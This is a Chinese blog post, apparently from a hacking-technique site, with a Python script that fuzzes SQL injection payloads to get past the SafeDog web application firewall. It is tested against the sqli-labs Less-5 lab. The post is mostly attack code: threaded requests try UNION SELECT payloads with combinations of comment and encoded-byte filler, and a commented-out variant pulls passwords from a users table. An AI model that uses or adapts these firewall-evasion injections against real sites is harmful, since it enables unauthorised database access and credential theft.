fuzz方法注入绕过安全狗

以sqli lab 第六关为测试环境
成功bypass
注释里的payload可以成功跑出带表名列名的信息

#encoding = utf8
import requests
from queue import Queue
import threading

fuzz_zs = ['/*','*/','/*!','*','=','`','!','@','%','.','-','+','|','%00']
fuzz_sz = ['',' ']
fuzz_ch = ["%0a","%0b","%0c","%0d","%0e","%0f","%0g","%0h","%0i","%0j"]
Fuzz=fuzz_ch+fuzz_sz+fuzz_zs
class fuzz:
    def __init__(self,root,ThreadNum=5):
        self.root="http://192.168.1.109/sqli/Less-5/?id=1"
        self.ThreadNum=5
        self.headers = {
             'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) 

AppleWebKit/535.20 (KHTML, like Gecko) Chrome/19.0.1036.7 Safari/535.20',
             'Referer': 'http://www.camel.com',
             'Cookie': 'whoami=digo8',
             }
        self.task =Queue()
        for a in Fuzz:
            for b in Fuzz:
                for c in Fuzz:
                    for d in Fuzz:
                        exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,3 --+"
                        '''exp=self.root+"' /*!union"+a+b+c+d+"select*/"+" 1,2,password 

/*!from "+a+b+c+d+"users*/--+"'''
                        self.task.put(exp)
        self.s_list = []
    
    def visit(self,url):
        try:
            r = requests.get(url,headers=self.headers)
            ret=r.text
        except:
            print ("Fail to connect...")
            ret=""
        return ret

    def test_url(self):
        while not self.task.empty():
            url = self.task.get()
            ret = self.visit(url)
            if "Dhakkan" in ret and not "error" in ret :
                self.s_list.append(url)
                print (url)
    
    def work(self):
        threads = []
        for i in range(self.ThreadNum):
            t = threading.Thread(target=self.test_url())
            threads.append(t)
            t.start()
        for t in threads:
            t.join()
obj=fuzz("http://192.168.1.109/sqli/Less-5/?id=1")
obj.work()

人已赞赏
黑客技术

主站全局广告劫持代码

2018-5-26 0:17:21

黑客技术

苹果惊爆史诗级硬件漏洞:你的iPhone可永久越狱,无法修复

2019-9-29 18:22:11

0 条回复 A文章作者 M管理员
    暂无讨论,说说你的看法吧
个人中心
购物车
优惠劵
今日签到
有新私信 私信列表
搜索